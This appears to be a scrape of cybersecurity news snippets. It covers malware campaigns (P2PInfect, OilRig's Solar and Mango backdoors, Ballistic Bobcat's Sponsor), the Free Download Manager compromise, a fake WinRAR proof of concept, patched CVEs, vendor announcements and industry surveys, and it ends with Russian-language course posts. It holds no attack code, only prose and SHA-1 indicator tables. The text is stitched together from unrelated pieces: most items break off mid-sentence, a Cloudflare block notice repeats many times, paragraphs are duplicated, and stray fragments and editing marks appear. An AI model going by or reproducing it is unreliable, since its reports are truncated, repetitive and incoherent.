"LuaDream stands as a compelling illustration of the continuous innovation and advancement efforts that cyber espionage threat actors pour into their ever-evolving malware arsenal," Milenkoski said.

SentinelO…

The peer-to-peer (P2) worm known as P2PInfect has witnessed a surge in activity since late August 2023, witnessing a 600x jump between September 12 and 19, 2023.

A majority of the compromises have been reported in China, the U.S., Germany, the U.K., Singapore, Hong Kong, and Japan.

P2PInfect first came to light in July 2023 for its ability to breach poorly secured Redis instances.

"The main payload also iterates through all users on the system and attempts to change their user passwords to a string prefixed by Pa_ and followed by 7 alphanumeric characters (e.g.

Cado Security said it observed the malware attempting to fetch a crypto miner payload, but there is no evidence of cryptomining to …

Learn how you can protect yourself against malicious 3rd-party appsGetting ConnectedThreat actors are using sophisticated phishing attacks to connect malicious applications to core SaaS applications.

Data Breaches – malicious third-party apps can access sensitive employee or customer records that are stored on the SaaS app.

malicious third-party apps can access sensitive employee or customer records that are stored on the SaaS app.

An SSPM, like Adaptive Shield, with the interconnectivity app detection capability, connected to your full SaaS stack will detect a malicious app.

With the right SSPM, you can ensure your configurations are sufficient to prevent malicious apps from taking over yo…

China's Ministry of State Security (MSS) has accused the U.S. of breaking into Huawei's servers, stealing critical data, and implanting backdoors since 2009, amid mounting geopolitical tensions between the two countries.

In a message posted on WeChat, the government authority said U.S. intelligence agencies have "done everything possible" to conduct surveillance, secret theft, and intrusions on many countries around the world, including China, using a "powerful cyber attack arsenal."

Germany, Japan, South Korea, India, and Taiwan are believed to be some of the countries targeted by the spyware.

UPCOMING WEBINAR Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM Stay ahead with a…

A financially motivated threat actor has been outed as an initial access broker (IAB) that sells access to compromised organizations for other adversaries to conduct follow-on attacks such as ransomware.

"This financially motivated group has been active since at least 2017, compromising organizations by exploiting vulnerabilities in unpatched internet-facing servers," the cybersecurity company said.

"The victimology suggests opportunistic attacks for financial gain rather than a targeted campaign conducted by a state-sponsored threat group for espionage, destruction, or disruption."

"Gold Melody acts as a financially motivated IAB, selling access to other threat actors," the company conclud…

The maintainers of Free Download Manager (FDM) have acknowledged a security incident dating back to 2020 that led to its website being used to distribute malicious Linux software.

"It appears that a specific web page on our site was compromised by a Ukrainian hacker group, exploiting it to distribute malicious software," it said in an alert last week.

"Only a small subset of users, specifically those who attempted to download FDM for Linux between 2020 and 2022, were potentially exposed."

FDM has also released a shell script for users to check for the presence of malware in their systems.

But it's worth pointing out that the scanner script does not remove the malware.

A malicious actor released a fake proof-of-concept (PoC) exploit for a recently disclosed WinRAR vulnerability on GitHub with an aim to infect users who downloaded the code with VenomRAT malware.

"The fake PoC meant to exploit this WinRAR vulnerability was based on a publicly available PoC script that exploited a SQL injection vulnerability in an application called GeoServer, which is tracked as CVE-2023-25157," Palo Alto Networks Unit 42 researcher Robert Falcone said.

Supercharge Your SkillsA closer examination of the attack infrastructure shows that the threat actor created the checkblacklistwords[.

"An unknown threat actor attempted to compromise individuals by releasing a fake PoC afte…

Finnish law enforcement authorities have announced the takedown of PIILOPUOTI, a dark web marketplace that specialized in illegal narcotics trade since May 2022.

"The site operated as a hidden service in the encrypted TOR network," the Finnish Customs (aka Tulli) said in a brief announcement on Tuesday.

It should also serve as a wake-up call for criminals who falsely believe their infrastructures, anonymity and actions are fully protected by the dark web.

The development comes as law enforcement agencies have intensified their efforts to dismantle darknet marketplaces such as Genesis Market and the Lolek bulletproof hosting service.

In May 2023, an international operation resulted in the ar…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Two ESET malware researchers took to the LABScon stage this year to deconstruct sophisticated attacks conducted by two well-known APT groupsThe lineup of speakers at this year's edition of LABScon featured two ESET malware researchers who took to the stage to deconstruct sophisticated attacks conducted by two well-known APT groups.

On Thursday, Zuzana Hromcová delivered a talk on two cyberespionage campaigns that OilRig, an Iran-aligned threat group, conducted throughout 2021 and 2022.

Both campaigns, OuterSpace and JuicyMix, targeted Israeli organizations, which is in line with the group’s focus on the Middle East, and both also used the same playbook.

ESET found the backdoor during routin…

42fb165bc9cf614996027a9fcb261d65fd513527 3740250369 0xDEEFB101 Network module configuration.

740D308565E215EB9B235CC5B720142428F540DB N/A Win64/Deadglyph.A Deadglyph Backdoor – Executor.

1805568D8362A379AF09FD70D3406C6B654F189F N/A MSIL/Deadglyph.A Deadglyph Backdoor – Orchestrator.

9CB373B2643C2B7F93862D2682A0D2150C7AEC7E N/A MSIL/Deadglyph.A Orchestrator Network module.

]com 2021-08-25 Deadglyph C&C server.

They used a new, previously undocumented C#/.NET first-stage backdoor in each campaign: Solar in Outer Space, then its successor Mango in Juicy Mix.

Outer Space campaign overviewNamed for the use of an astronomy-based naming scheme in its function names and tasks, Outer Space is an OilRig campaign from 2021.

We named the campaign Juicy Mix for the use of a new OilRig backdoor, Mango (based on its internal assembly name, and its filename, Mango.exe).

It communicates with the C&C server using the function MercuryToSun, which sends basic system and malware version information to the C&C server and then handles the server’s response.

The group improved upon its C#/.NET Solar backdoor from the O…

This time, we’ll share 10 general ways for cybersecurity jobseekers to impress at their interview.

What to expectNailing the interview will likely require a combination of technical knowledge, problem-solving skills, and the ability to effectively communicate your expertise.

Remember also that since cybersecurity is a multidisciplinary field, interviewers may assess a range of skills and knowledge areas.

You may want to tailor your preparation to the specific role you're applying for, whether it's a security analyst, penetration tester, or security engineer.

Rehearse answers to some common interview questionsThis is another no-brainer and an exercise where having an interview partner really…

Ballistic Bobcat is a suspected Iran-aligned cyberespionage group that targets organizations in various industry verticals, as well as human rights activists and journalists, mainly in Israel, the Middle East, and the United StatesThis week, ESET researchers unveiled their findings about a campaign by the Ballistic Bobcat APT group that deployed a novel backdoor against businesses mainly in Israel.

Ballistic Bobcat – previously tracked by ESET Research as APT35/APT42 and also known as Charming Kitten, TA453, or PHOSPHORUS – is a suspected Iran-aligned cyberespionage group that targets education, government, and healthcare organizations, as well as human rights activists and journalists.

Rea…

Ballistic Bobcat is a suspected Iran-aligned cyberespionage group that targets organizations in various industry verticals, as well as human rights activists and journalists, mainly in Israel, the Middle East, and the United StatesThis week, ESET researchers unveiled their findings about a campaign by the Ballistic Bobcat APT group that deployed a novel backdoor against businesses mainly in Israel.

Ballistic Bobcat – previously tracked by ESET Research as APT35/APT42 and also known as Charming Kitten, TA453, or PHOSPHORUS – is a suspected Iran-aligned cyberespionage group that targets education, government, and healthcare organizations, as well as human rights activists and journalists.

Rea…

To recognize phishing, read the whole message carefully, look for grammar mistakes, check the sender, and pay attention to links and unexpected attachments.

The attackers had sent fake corporate messages to Reddit employees that pointed them to a phishing website resembling Reddit’s intranet gateway.

The fake subreddits often pretend to be crypto trading forums, with their moderators impersonating legitimate traders.

They set up accounts copy and paste older legitimate content from Reddit, boosting their own karma score and posing as legitimate users.

ConclusionIn today's digital age, scams have found their way into various corners of the internet, including popular platforms such as Reddit…

To recognize phishing, read the whole message carefully, look for grammar mistakes, check the sender, and pay attention to links and unexpected attachments.

The attackers had sent fake corporate messages to Reddit employees that pointed them to a phishing website resembling Reddit’s intranet gateway.

The fake subreddits often pretend to be crypto trading forums, with their moderators impersonating legitimate traders.

They set up accounts copy and paste older legitimate content from Reddit, boosting their own karma score and posing as legitimate users.

ConclusionIn today's digital age, scams have found their way into various corners of the internet, including popular platforms such as Reddit…

And that’s just scratching the surface of the trends observed in the latest ESET Threat Report, the focus of this episode.

Oh, and let’s not forget the criminal practice of usury, appearing in the form of malicious Android apps.

Yet, it wasn’t all bad in H1 2023.

For all those topics and more from ESET Threat Report, listen to the latest episode of ESET Research podcast, hosted by Aryeh Goretsky.

This time, he directed his questions to one of the authors of the report, Security Awareness Specialist Ondrej Kubovič.

And that’s just scratching the surface of the trends observed in the latest ESET Threat Report, the focus of this episode.

Oh, and let’s not forget the criminal practice of usury, appearing in the form of malicious Android apps.

Yet, it wasn’t all bad in H1 2023.

For all those topics and more from ESET Threat Report, listen to the latest episode of ESET Research podcast, hosted by Aryeh Goretsky.

This time, he directed his questions to one of the authors of the report, Security Awareness Specialist Ondrej Kubovič.

IoCsFilesSHA-1 Filename Detection Description 098B9A6CE722311553E1D8AC5849BA1DC5834C52 N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v1).

5AEE3C957056A8640041ABC108D0B8A3D7A02EBD N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v2).

764EB6CA3752576C182FC19CFF3E86C38DD51475 N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v3).

2F3EDA9D788A35F4C467B63860E73C3B010529CC N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v4).

E443DC53284537513C00818392E569C79328F56F N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v5, aka Alumina).

IoCsFilesSHA-1 Filename Detection Description 098B9A6CE722311553E1D8AC5849BA1DC5834C52 N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v1).

5AEE3C957056A8640041ABC108D0B8A3D7A02EBD N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v2).

764EB6CA3752576C182FC19CFF3E86C38DD51475 N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v3).

2F3EDA9D788A35F4C467B63860E73C3B010529CC N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v4).

E443DC53284537513C00818392E569C79328F56F N/A Win32/Agent.UXG Ballistic Bobcat backdoor, Sponsor (v5, aka Alumina).

The update to X's privacy policy has sparked some questions among privacy and security folks, including how long X will retain users' biometric information and how the data will be stored and securedWill you give X your biometric data in order to help secure your account on the site?

The social media platform formerly known as Twitter has announced that it will begin collecting biometric data from its paying users in order to help combat fraud and impersonation on the site.

The update to X's privacy policy – which also includes a move to begin collecting users' employment and job history – has inevitably sparked some discussion and questions from privacy and security folks, including:How lo…

The update to X's privacy policy has sparked some questions among privacy and security folks, including how long X will retain users' biometric information and how the data will be stored and securedWill you give X your biometric data in order to help secure your account on the site?

The social media platform formerly known as Twitter has announced that it will begin collecting biometric data from its paying users in order to help combat fraud and impersonation on the site.

The update to X's privacy policy – which also includes a move to begin collecting users' employment and job history – has inevitably sparked some discussion and questions from privacy and security folks, including:How lo…

5 cybercrime trends to keep an eye onNation states are teaming up with cybercriminalsState-sponsored activity and cybercrime were for years quite distinct areas.

It’s manifest not only in the fact that some actors use cybercrime techniques to steal money for the state.

Europol goes further, claiming data is the “central commodity” of the cybercrime economy, fueling extortion (e.g., ransomware), social engineering (e.g., phishing) and much more.

Phishing remains startlingly effectivePhishing has been a top threat vector for many years, and continues to be a favored route to obtaining logins and personal information, as well as covertly deploying malware.

Unfortunately, there’s little sign of…

Mom’s Meals issues “Notice of Data Event”: What to know and what to do

S3 Ep149: How many cryptographers does it take to change a light bulb?

Using WinRAR?

Be sure to patch against these code execution bugs…

Have you listened to our podcast?

“Snakes in airplane mode” – what if your phone says it’s offline but isn’t?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

S3 Ep147: What if you type in your password during a meeting?

Have you listened to our podcast?

(CVE-2023-5009)GitLab has fixed a critical vulnerability (CVE-2023-5009) in the Enterprise Edition (EE) and Community Edition (CE) of its widely used DevOps platform.

It’s engineered for scalability, durability, and security, making it a popular option for data storage and distribution.

18 free Microsoft Azure cybersecurity resources you should check outHere’s a list of free Azure cybersecurity resources that Microsoft offers to anyone interested in learning.

PostgreSQL 16: Where enhanced security meets high performancePostgreSQL 16 provides finer-grained options for access control and enhances other security features.

Organizations are racing against time to meet the PCI DSS 4.0 deadlinePa…

To help protect consumers from browser-based security, privacy and identity threats, Norton, a consumer Cyber Safety brand of Gen, has released Norton Secure Browser.

Web shield : blocks malicious websites and phishing attempts while browsing and prevents people from downloading potentially malicious content, that can try to infect their device.

: blocks malicious websites and phishing attempts while browsing and prevents people from downloading potentially malicious content, that can try to infect their device.

The Norton search engine flags safe and potentially dangerous results so you know if a webpage is safe.

Norton Secure Browser is available for Windows PC and Mac, with additional pl…

Keysight Technologies and Synopsys are partnering to provide internet of things (IoT) device makers with a comprehensive cybersecurity assessment solution to ensure consumers are protected when devices are shipped to market.

Under the arrangement, the Synopsys Defensics fuzzing tool will be embedded as an option into the Keysight IoT Security Assessment solution.

The global IoT device market is experiencing notable growth due to the rise in adoption of IoT devices and is projected to reach a market value of $413.7 billion by 2031.

According to Palo Alto Networks IoT Threat Report, the vulnerability of IoT devices makes them easy targets with 57% of IoT devices at risk of medium or high-seve…

The agreement will add Mitek’s biometric-based identity verification and liveness detection technology to Equifax’s digital identity software, further strengthening Equifax’s ability to help companies prevent identity fraud.

Additionally, credit card fraud is proven to be the top form of identity fraud with more than 400,000 reports in the past year.

To combat emerging fraud threats, Equifax will leverage Mitek’s artificial intelligence-powered identity verification technology with its own fraud data solutions.

“Our mission is to help people live their best financial lives,” said Adam Gunther, SVP & CEO, Equifax Digital Solutions.

It is an honor to join forces with Equifax, a world-leading …

hrough this new technology, DAT can now leverage AI and machine learning to validate user identities and scrutinize suspicious accounts.

Users of the DAT network can now:Verify the identity of the entities they are doing business with.

DAT’s AI-powered identity-verification solution is powered by Verosint and works in the background to maintain a secure and seamless login experience for legitimate users.

Robinson said: “Automated identity verification is a game-changer.

Verosint’s identity-centric platform combined with DAT’s data and AI capabilities takes identity verification to a new level – a first in the industry.”

Contrast Security, the code security platform built for developers and trusted by security, today announced its integration with Amazon Web Services (AWS) Security Hub to offer full-spectrum security visibility, from infrastructure to applications.

AWS Security Hub is a cloud security posture management service that automates best practice checks, aggregates alerts and supports automated remediation.

Contrast’s integration with AWS Security Hub will allow mutual customers to address security concerns before deployment, making the process proactive rather than reactive.

This results in secure applications, reduced risk and improved compliance, providing an additional layer of protection for …

GitLab has fixed a critical vulnerability (CVE-2023-5009) in the Enterprise Edition (EE) and Community Edition (CE) of its widely used DevOps platform.

“Scan execution policy allows configuring built-in scanners for GitLab projects, such as static analysis and vulnerability scanning.

The vulnerability is a bypass to another vulnerability (CVE-2023-3932) reported and fixed one month ago.

If an upgrade is impossible, Malcolm advised disabling the “direct transfers” or “security policies” feature (or both).

Earlier this year, GitLab addressed security issues CVE-2022-41903 and CVE-2022-23521 in Git that affected its Community Edition and Enterprise Edition.

The patched zero-days (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993)CVE-2023-41992, in the Kernel framework, allows a local attacker to elevate privileges.

CVE-2023-41991, in the Security framework can be exploited by a malicious app to bypass signature validation.

Recent zero-days flagged by Citizen LabEarlier this month, Apple closed two zero-day vulnerabilities (CVE-2023-41064, CVE-2023-41061) that have been chained together by attackers to deliver NSO Group’s Pegasus spyware.

A few days later, Google pushed out a security update for a Chrome zero-day vulnerability (CVE-2023-4863) exploited in the wild.

The vulnerability is in the WebP image library, and has been reported by Apple Secu…

Anviz introduced an all-in-one intelligent security solution for the education industry – Anviz One – bolstering the security infrastructure of public and private educational institutions from K-12 to university with lower upfront investment, stronger analytics, and simplified management.

As a surveillance solution innovator, we aim to help schools of all levels upgrade security infrastructure with minimal cost and IT complexity.

The benefits of edge + cloud architectureWith Anviz One, the deployment of a whole-campus security system has never been easier.

In addition, Anviz also offers professional services to optimize security operations and share experiences with the campus management te…

That’s partly why banking and financial institutions are heavily regulated and have more compliance requirements than those in most other industries.

Automation streamlines complianceWhile people and process are extremely important to meeting such compliance requirements, the third pillar—technology—is perhaps most critical.

This simply isn’t sustainable for IT teams, given the number of security controls they must manage, the volume of data they generate, and continuous, risk-based compliance requirements.

They need a more automated way to continuously measure and evidence KPIs and metrics across all security controls.

That way they can better identify control gaps, actively improve securi…

Here’s a look at the most interesting products from the past week, featuring releases from 1Password, Dig Security, Laiyer.ai, Viavi Solutions, and Wing Security.

Wing Security releases SaaS protection tier for mid-market companiesWing Security launched its new SSPM for Compliance tier, enabling mid-market companies to adopt SaaS solutions while meeting a base level of security required by compliance frameworks.

Dig enhances its platform to protect enterprise data in all storage environmentsDig has expanded the Dig Data Security Platform to protect data anywhere enterprises store sensitive information, including public cloud, software as a service (SaaS), database as a service (DBaaS) and o…

Overall cyber insurance claims frequency increased by 12% in the first half of 2023, according to Coalition.

Increase in ransomware claims frequencyCoalition found that both claims frequency and severity rose for businesses in early 2023 across all revenue bands.

Coalition’s report also saw a resounding increase in ransomware claims frequency in 1H 2023, which grew by 27% from 2H 2022.

FTF claims frequency increased by 15% in 1H 2023, and FTF severity increased by 39% to an average loss of more than $297,000.

Overall, companies using Google Workspace experienced a 25% risk reduction for FTF or BEC claims and a 10% risk reduction for ransomware claims.

57% of all monitored apps are under attack, with gaming (63%) and FinServ (62%) apps facing the highest risk, according to Digital.ai.

The study found no correlation between an app’s popularity and likelihood of being attacked but found Android apps are more likely to be put in unsafe environments (76%) than iOS apps (55%).

Android apps are also more likely (28%) to be run with modified code than iOS apps (6%).

Our customers have determined that building security into their apps is the best way to prevent attacks on their apps,” added Ellis.

Apps outside of FinServ and gaming – such as implantable medical devices, Bluetooth-connected phone apps, retail, and more – have a 54% chance of being…

83% of IT security professionals admit they or someone in their department has made errors due to burnout that have led to a security breach.

77% say stress levels at work directly affect their ability to keep customer data safe.

“Caring for security teams isn’t just a ‘nice thing’ to do.

82% say they’ve been told stress and burnout is just a normal part of their job.

“Organizations that proactively provide staff with training, solutions, and mental health resources have healthier and happier security teams and are more secure because of it.”

57% of SMEs have fallen victim to at least one cybersecurity breach, among whom 31% reported that their business experienced a breach within the past 12 months alone, according to Guardz.

The increasing number of evolving cyber threats poses a significant risk to SMEs.

Businesses neglect employee cybersecurity trainingMeanwhile, 29% of small and medium-sized businesses reported currently having no cyber insurance.

“These survey findings reinforce the critical and urgent need to prioritize cybersecurity preparedness within the SME community,” said Dor Eisner, CEO of Guardz.

“Understandably, not all small business owners have the resources to obtain in-house cybersecurity experts – but that d…

Typically, organisations need to retro-fit controls, tools, and policies into systems with varying levels of technical debt resulting in a disjointed approach.

This is called Secure Access Service Edge or SASE (for those of you wondering, it’s pronounced SASY).

The effective implementation of a SASE Architecture involves a deep understanding of the network, security, and end-user requirements to be successful.

Fortinet’s approach to SASE looks to extend far further than the current solutions, coining the term Universal SASE.

Come and listen to my product innovation session at the Tech Hub stage called ‘The Journey to Secure Access Service Edge (SASE)’ at 13:25-13:45 on the 26th of September.

WatchGuard® Technologies, provider of unified cybersecurity, today announced the acquisition of CyGlass Technology Services, a provider of cloud and network-centric threat detection and response solutions that help organisations see risks, stop threats, and prove compliance.

WatchGuard notes that the CyGlass technology will add to its Unified Security Platform® architecture, delivering AI-based detection of network anomalies with a future Network Detection and Response (NDR) service, and will accelerate Open eXtended detection and response (XDR) capabilities within WatchGuard ThreatSync.

“The success of CyGlass in the last year demonstrates that mid-sized companies and MSPs are seeking inno…

The annual DSIT study of Cyber security skills in the UK labour market consistently reveals a lack of basic skills, with the 2023 results indicating that 50% of businesses have a basic skills gap in relation to technical cyber security (estimated to equate to approximately 739,000 businesses).

In parallel, SMEs face an increasing expectation to address cyber security and comply with good practice.

The aim of the research is to better understand the cyber security support needs of the SMEs (particularly those of smaller businesses), and to pilot a new approach that engages them in further supporting each other.

The ultimate aim of the project is to then use the collective findings to inform …

™) in its latest research report: This week, Keeper Security announced that it has been identified as a leading privileged access management (PAM) provider for its product strength and cost-efficiency.

The EMA PAM Radar compares the product strengths and cost-efficiencies of these imperative cybersecurity solutions which define, control and manage access to an organisation’s most sensitive accounts, systems and applications.

“The EMA Radar distinguishes Keeper as a ‘Value Leader’ that delivers strong products and platform architectures for a comparatively low total cost of ownership,” said Steve Brasen, EMA Research Director for Endpoint and Identify Management.

KeeperPAM was also recognise…

Synopsys has announced it has been recognised as a leader in The Forrester Wave™: Static Application Security Testing, Q3 2023.

The report identifies the 11 most significant vendors in the static application security testing (SAST) market and evaluates them against 26 criteria grouped into three high-level categories: Current offering, Strategy, and Market presence.

Synopsys’ Coverity® SAST solution received the second highest score in the Current offering category and tied for the second highest scores in the Strategy and Market presence categories.

Within the Strategy category, Synopsys received the highest possible scores in the Roadmap, Partner ecosystem, and Supporting services and off…

Cato Networks, provider of the world’s leading single-vendor SASE platform, announced it raised $238M in equity investment, bringing total funding to $773M.

“Cato’s SASE platform uniquely enables organisations of all sizes to optimally secure their businesses without the cost, complexity, and risk of owning and maintaining a pile of point solutions.

As of 11 September 2023,[YY1] [DG2] the Cato SASE Cloud had the highest overall rating of any rated single-vendor SASE platform (4.7 out of 5) based on 10x more reviews than any other vendor in the Single-Vendor SASE market.

“Cato Networks is the poster child for ZTE and SASE,” writes Forrester Research in The Forrester Wave™: Zero Trust Edge So…

Today, Specops Software, an Outpost24 company, has announced the launch of its new continuous scanning capabilities within Specops Breached Password Protection.

The feature is available now to all Specops Breached Password Protection customers.

Continuous scanning for breached passwords is a feature included within Specops Breached Password Protection, an add-on for Specops Password Policy which is the comprehensive Active Directory password management system that enhances, enforces and extends password security for the entire organisation.

Specops Software continuously monitors and checks against a daily updated database of 3 billion unique passwords in Specops Breached Password Protection…

Today, Salt Security announced that it has expanded its partnership with CrowdStrike by integrating the Salt Security API Protection Platform with the industry-leading CrowdStrike Falcon® Platform.

With this new integration, customers now can get a 360-degree view of API security risks with unique insights into the application-layer attack surface.

Available on the CrowdStrike Marketplace, the new integration delivers robust API threat intelligence and enhanced cross-organization API security functions by streamlining and improving API auditing, monitoring, and enforcement workflows.

We are excited to bring our unique strengths in API security to the CrowdStrike customer base with this new …

Acronis, a global cyber protection company, today announced the launch of Acronis Cyber Protect Home Office (formerly Acronis True Image).

Acronis Cyber Protect Home Office is designed to conquer the evolving landscape of cyber threats by integrating Acronis’ cutting-edge cyber protection and secure backup solutions.

By combining AI-powered defense mechanisms, robust data backup, remote management tools, and mobile device protection, Acronis sets the standard for holistic cyber protection.

Acronis Cyber Protect Home Office is the only complete active-security solution that addresses cyber protection needs within a single, easy-to-use, and modern platform.

Acronis Cyber Protect Home Office i…

should be held most responsible and face the harshest penalty.

Additionally, of these individuals, over a third (34%) consider prison to be the most suitable punishment for a data breach.

This survey was conducted among 1,000 nationally representative UK respondents (aged 16+) by Censuswide, on behalf of International Cyber Expo.

Granted, a higher proportion of the population (29%) think the cybercriminals who exploited the organisation’s vulnerabilities should be held most responsible.

When asked who should be responsible for financially compensating the victims of a data breach (i.e.

The TAG Heuer Porsche Formula E Team relies on the security of the Cato SASE Cloud platform.

SASE = Security and Network ManagementThe SASE cloud platform not only serves the purpose of defending against attackers but also ensures the highest possible data transmission quality.

This demonstrates that the SASE cloud platform is valuable not only for high-end connections but especially in situations with varying qualities.

Of course, the performance of the Cato SASE Cloud depends on local conditions and distances between nodes, but it optimizes the situation wherever possible.

Thanks to the SASE Cloud platform, the TAG Heuer Porsche Formula E Team can rely on consistently stable, fast, and se…

Lookout, Inc., the data-centric cloud security company, today announced the availability of Lookout Mobile Endpoint Security to CrowdStrike channel partners and customers via the CrowdStrike Marketplace.

As part of CrowdStrike’s world-class ecosystem of compatible solutions from trusted partners, Lookout will be the first mobile threat defence solution in the CrowdStrike Marketplace.

Lookout Mobile Endpoint Security provides visibility into mobile threats and state-sponsored spyware, while protecting against mobile phishing and credential theft.

Attendees are invited to booth #802 to witness first-hand why Lookout Mobile Endpoint Security is the industry’s most advanced mobile threat defenc…

In recent years, however, Coroneos has turned his attention to the mental health of cybersecurity professionals.

In 2022, he established Cybermindz, a dedicated not-for-profit mental health initiative.

Coroneos knows the importance of wellbeing support for cybersecurity professionals first-hand: “We’re all cyber people ourselves; we are the industry.

To coincide with the UK launch of the non-profit, this week Cybermindz are hosting a virtual summit on the topic of UK mental health in cybersecurity leadership.

You can register for free here: UK Mental Health in Cybersecurity Leadership Summit + UK launch of Cybermindz | HumanitixDo you know an organisation that’s doing incredible things for …

Dragos, Inc., the global leader in cybersecurity for industrial controls systems (ICS)/operational technology (OT) environments, today announced a $74 million Series D extension, led by strategic operating and investing firm WestCap.

This brings the Series D round to $274 million, with total funds raised to date now approximately $440 million.

According to analyst firm Frost & Sullivan, “The global industrial cybersecurity market will likely hit $10.2 billion by 2025 from $3.3 billion in 2020, registering exponential growth at a compound annual growth rate (CAGR) of 25.3%.1” The funding will support additional go-to-market initiatives to meet growing demand.

This year, Dragos has already ex…

A new study from Forbes Advisor has unveiled that a staggering 93% of employers perceive there to be an IT skills gap within the UK job market.

When examining the primary reasons behind the IT skills gap, more than two in five businesses (42%) attribute the issue to the rapid pace of technological advancements.

How are businesses aiming to bridge the IT skills gap?

Research has uncovered the ways in which British businesses are rising to the challenge of the IT skills gap by implementing innovative strategies.

Mark Hooson, technology reporter at Forbes Advisor, said: “Small businesses may be able to tackle the IT skills gap with useful software and website builders.

Выложил на Udemy свой первый курс по подготовке к сертификационному аудиту СУИБ по ISO 27001, "ISO 27001:2022. How to prepare for a certification audit"На нем я разбираю задачи, которые надо сделать До. Во время и После сертификационного аудита. Курс на английском языке.

Cybersecurity Frameworks for DMZCON23 230905.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

My 15 Years of Experience in Using Mind Maps for Business and Personal Purposes from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

From NIST CSF 1.1 to 2.0.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

 

Всем привет. Пропал, каюсь, работы слишком много :(А пока принес вам 40% скидку на все курсы и сертификации от Linux Foundation. Скидка действует только сегодня.Если кто давно планировал сдать что-то серьезное по k8s, Linux или из DevOps — самое время. Например Certified Kubernetes Administrator (CKA) и Certified Kubernetes Security Specialist (CKS) бандлом стоит $435 вместо $725.Экзамен можно сдать в течении года после покупки> https://training.linuxfoundation.org/end-of-summer-2023/

